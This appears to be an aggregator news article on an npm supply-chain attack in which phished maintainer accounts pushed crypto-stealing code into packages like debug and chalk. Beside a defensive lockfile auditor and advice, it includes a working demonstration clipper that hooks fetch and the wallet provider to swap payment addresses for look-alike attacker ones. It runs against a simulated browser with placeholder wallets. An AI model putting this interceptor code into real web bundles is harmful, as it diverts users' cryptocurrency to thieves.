
Security / Supply Chain

NPM Packages Hijacked in Large-Scale Supply Chain Attack

A large-scale supply chain attack has compromised npm packages that together see over 2.6 billion weekly downloads. Attackers injected malicious code into popular packages after taking over maintainer accounts through phishing, leading to the hijack...

NPM Attack Injects Crypto-Stealing Malware Into Core JavaScript Libraries

[Image: NPM Packages Hijacked in Large-Scale Supply Chain Attack, via Cointelegraph]

Key Insights

  • Attackers compromised NPM package maintainers via phishing emails impersonating npmjs.com.
  • Malicious code injected into packages acts as a browser-based interceptor, hijacking network traffic and application APIs.
  • The malware targets cryptocurrency addresses and transactions, redirecting them to attacker-controlled wallets.
  • Impacted packages include widely used libraries such as debug, chalk, and ansi-styles.
  • The attack highlights the increasing risk of supply chain attacks targeting JavaScript libraries.

In-Depth Analysis

The phishing emails warned maintainers that their accounts would be locked unless they "updated" their two-factor authentication, and pointed them at a look-alike site that captured the credentials and one-time codes they entered. With those, the attackers published new versions of the packages through the legitimate maintainer accounts, so the releases looked like ordinary patch versions and nothing about the install distinguished them from a benign update. The injected code targets the browser: it wraps the page's network and wallet interfaces (fetch, XMLHttpRequest and the in-page wallet provider APIs) and watches for cryptocurrency transactions passing through them. When it sees a destination wallet address, it substitutes one the attackers control, so the transfer the user approved on screen is not the one that is sent. Aikido Security's analysis showed the code working at several layers at once: rewriting page content, tampering with the application's API calls, and interfering with the user's interactions with the app, which lets it defeat a quick visual check of the address. This attack follows similar incidents and underlines the growing pressure on the JavaScript ecosystem.
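To make the mechanism concrete, here is an added example (not code from the article, from Aikido's analysis, or from the affected packages) of the browser-side interceptor pattern described above, followed by an integrity probe a web app can run against its own fetch. Everything in it is constructed: the attacker addresses are placeholders rather than real wallets, the "browser" is a synchronous stand-in so the scenario runs in plain Node, and the echo endpoint, the `closestAttackerAddress` look-alike selection and the canary value are illustrative assumptions, not details taken from the page.

```javascript
// Added example: a reduced model of a browser "crypto-clipper" (the attack side)
// and a canary probe that detects a hooked fetch (the defender side).
// All addresses, the fake provider and the echo transport are constructed.

const ETH_ADDR_RE = /0x[0-9a-fA-F]{40}/g;

// Constructed attacker-controlled addresses (placeholders, not real wallets).
const ATTACKER_ADDRS = [
  "0x" + "1".repeat(40),
  "0x" + "abcdef".repeat(6) + "abcd",
];

// Edit distance, used to pick the attacker address that looks most like the
// victim's: a look-alike swap survives the "check the first and last few
// characters" habit. Assumed selection strategy for this illustration.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const up = row[j];
      row[j] = Math.min(up + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = up;
    }
  }
  return row[b.length];
}

function closestAttackerAddress(victim, attackers = ATTACKER_ADDRS) {
  let best = attackers[0];
  let bestDist = Infinity;
  for (const a of attackers) {
    const d = levenshtein(victim.toLowerCase(), a.toLowerCase());
    if (d < bestDist) { best = a; bestDist = d; }
  }
  return best;
}

// Content layer: rewrite every address found in outgoing text.
function swapAddresses(text) {
  return text.replace(ETH_ADDR_RE, (m) => closestAttackerAddress(m));
}

// What a malicious package does once it runs in the page: wrap fetch and the
// wallet provider so destinations are swapped after the user has reviewed them.
function installClipper(win) {
  const realFetch = win.fetch;
  win.fetch = function (url, init = {}) {
    const patched = { ...init };
    if (typeof patched.body === "string") patched.body = swapAddresses(patched.body);
    return realFetch.call(win, url, patched);
  };
  if (win.ethereum && typeof win.ethereum.request === "function") {
    const realRequest = win.ethereum.request.bind(win.ethereum);
    win.ethereum.request = (args) => {
      if (args && args.method === "eth_sendTransaction" && Array.isArray(args.params)) {
        args = {
          ...args,
          params: args.params.map((tx) =>
            tx && typeof tx.to === "string" ? { ...tx, to: swapAddresses(tx.to) } : tx),
        };
      }
      return realRequest(args);
    };
  }
}

// Constructed stand-in for the browser: fetch "posts" to an echo endpoint that
// returns the body it received, and the wallet provider records what it signed.
// Both are synchronous here purely so the scenario runs without a browser.
function makeBrowserLike() {
  const signed = [];
  return {
    fetch: (_url, init = {}) => ({ ok: true, body: String(init.body ?? "") }),
    ethereum: { request: (args) => { signed.push(args); return "0x" + "ab".repeat(32); } },
    signed,
  };
}

// Defensive probe: send a known address through the page's own fetch to a
// same-origin echo endpoint and compare. A hooked fetch rewrites the canary.
const CANARY = "0x" + "0".repeat(36) + "dEaD"; // constructed canary value

function fetchLooksTampered(win) {
  const payload = JSON.stringify({ to: CANARY });
  const res = win.fetch("https://app.example/echo", { method: "POST", body: payload });
  return res.body !== payload;
}

// End-to-end scenario: clean page, then the malicious code loads, then the user
// sends funds to an address one character away from an attacker address.
function runScenario() {
  const win = makeBrowserLike();
  const before = fetchLooksTampered(win);
  installClipper(win);
  const after = fetchLooksTampered(win);
  const intended = "0x" + "1".repeat(39) + "2"; // constructed user destination
  win.ethereum.request({ method: "eth_sendTransaction", params: [{ to: intended, value: "0x1" }] });
  return { before, after, intended, signedTo: win.signed[0].params[0].to };
}

console.log(runScenario());
```

Run it with `node clipper-demo.js`: `before` is false, `after` is true, and the transaction that reaches the provider carries the attacker's address even though `intended` is what the user typed. The probe only tells you the page's fetch has been wrapped; it does not tell you by whom, so treat a positive as a reason to stop and inspect the loaded bundle, and keep in mind that a clipper which also hooks the probe's echo path would need a different check, such as verifying the destination on a hardware wallet's own display.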


FAQ

What is a supply chain attack?

A supply chain attack targets vulnerabilities in the software development and distribution process to compromise end-users.

How were the NPM packages compromised?

Attackers sent maintainers phishing emails that led to a fake npm login page, capturing both their passwords and their one-time 2FA codes. With control of the accounts, they published new versions of the packages containing the malicious code.

What is the impact of this attack?

The attack redirects cryptocurrency transactions to attacker-controlled wallets, resulting in financial losses for users.

Which packages were affected?

Affected packages include debug, chalk, ansi-styles, and others, collectively downloaded over 2.6 billion times weekly.

How can I protect myself from this type of attack?

If you maintain packages: enable 2FA, treat any email asking you to "update" or "reset" 2FA as suspect, and navigate to npmjs.com yourself rather than following a link. If you consume packages: commit a lockfile and install from it (`npm ci`), pin to known-good versions when an advisory names bad ones, check what is actually installed (for example `npm ls chalk` shows every copy, including nested ones), and audit dependencies regularly for unexpected releases.

Takeaways

  • Verify the legitimacy of emails before clicking on links or entering credentials; account-lockout threats and urgent 2FA "updates" are classic phishing lures.
  • Enable two-factor authentication (2FA) on all accounts, and remember that a phishing page can relay one-time codes, so 2FA alone did not stop this attack.
  • Regularly audit your project dependencies, including nested copies, for versions named in advisories or releases you did not expect.
  • Confirm the destination of a cryptocurrency transaction on the wallet's own confirmation screen (a hardware wallet display where available) rather than on the web page, since this malware operates inside the page.
  • Stay informed about the latest security threats and vulnerabilities.
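The FAQ answer and the takeaways above both recommend auditing installed dependencies against an advisory. The following added example (not code from the article or from npm) does that for a `package-lock.json`: it walks the lockfile v2/v3 `packages` map, or the v1 `dependencies` tree, and reports every installed copy whose name and version appear in an advisory list, nested copies included. The advisory versions below are placeholders ("9.9.9"), because the real affected version numbers are in the source advisory and not on this page; the sample lockfile is constructed.

```javascript
// Added example: flag lockfile entries that match an advisory of trojanized
// package versions. ADVISORY and SAMPLE_LOCK are constructed placeholders.

// PLACEHOLDER versions: replace with the versions listed in the advisory you act on.
const ADVISORY = {
  chalk: ["9.9.9"],
  debug: ["9.9.9"],
  "ansi-styles": ["9.9.9"],
};

// Derive a package name from a lockfile path such as
// "node_modules/some-lib/node_modules/@scope/pkg".
function nameFromPath(path) {
  const marker = "node_modules/";
  return path.slice(path.lastIndexOf(marker) + marker.length);
}

// Returns [{ path, name, version }] for every installed copy that the advisory names.
function findAffected(lock, advisory = ADVISORY) {
  const hits = [];
  const check = (path, name, version) => {
    if (advisory[name] && advisory[name].includes(version)) hits.push({ path, name, version });
  };
  if (lock.packages) {
    // lockfile v2/v3: flat map keyed by install path; "" is the root project itself.
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (!path) continue;
      check(path, meta.name || nameFromPath(path), meta.version);
    }
  } else {
    // lockfile v1: nested dependency tree.
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        const path = prefix + "node_modules/" + name;
        check(path, name, meta.version);
        walk(meta.dependencies, path + "/");
      }
    };
    walk(lock.dependencies, "");
  }
  return hits;
}

// Constructed sample: one direct hit and one nested hit, plus a clean copy of debug.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "my-app", version: "1.0.0" },
    "node_modules/chalk": { version: "9.9.9" },
    "node_modules/debug": { version: "4.3.4" },
    "node_modules/some-lib": { version: "2.0.0" },
    "node_modules/some-lib/node_modules/debug": { version: "9.9.9" },
  },
};

console.log(findAffected(SAMPLE_LOCK));
```

To run it against a real project, replace `SAMPLE_LOCK` with `JSON.parse(require("fs").readFileSync("package-lock.json", "utf8"))`. A hit means a bad version is what `npm ci` would install, so the fix is to pin or override the version in `package.json`, regenerate the lockfile, and reinstall; checking `node_modules` alone misses the lockfile that will reintroduce the version on the next clean install.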

Discussion

Do you think supply chain attacks will continue to increase? What steps can be taken to better secure the JavaScript ecosystem? Share this article with others who need to stay ahead of this trend!


Disclaimer

This article was compiled by Yanuki using publicly available data and trending information. The content may summarize or reference third-party sources that have not been independently verified. While we aim to provide timely and accurate insights, the information presented may be incomplete or outdated.

All content is provided for general informational purposes only and does not constitute financial, legal, or professional advice. Yanuki makes no representations or warranties regarding the reliability or completeness of the information.

This article may include links to external sources for further context. These links are provided for convenience only and do not imply endorsement.

Always do your own research (DYOR) before making any decisions based on the information presented.